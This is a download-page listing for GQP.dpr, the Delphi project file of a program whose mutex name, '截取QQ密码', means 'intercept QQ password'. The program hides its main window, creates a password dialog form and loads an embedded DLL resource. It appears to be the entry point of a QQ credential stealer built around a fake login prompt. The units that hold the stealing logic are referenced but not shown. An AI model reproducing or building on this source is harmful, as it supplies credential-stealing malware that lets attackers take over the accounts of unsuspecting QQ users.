GQP.dpr
上传用户:jiansibo
上传日期:2015-07-04
资源大小:524k
文件大小:1k
- {....................author: ZHY............
- ....................qq:65862177............
- ...........e-mail:zhyprogram@163.com.........
- }
- program GQP;
- uses
- Forms,
- windows,
- Mainfrm in 'Mainfrm.pas' {GQPFRM},
- Types in 'Types.pas',
- PassWordFrm in 'PassWordFrm.pas' {PasswordDlg};
- {$R *.RES}
- {$R Dll.res}
- var
- hMutex:HWND;
- begin
- hMutex:=CreateMutex(nil,false,'截取QQ密码');
- if GetLastError<>ERROR_ALREADY_EXISTS then
- begin
- Application.Initialize;
- application.ShowMainForm:=false;
- Application.CreateForm(TGQPFRM, GQPFRM);
- Application.CreateForm(TPasswordDlg, PasswordDlg);
- Application.Run;
- end;
- ReleaseMutex(hMutex);
- end.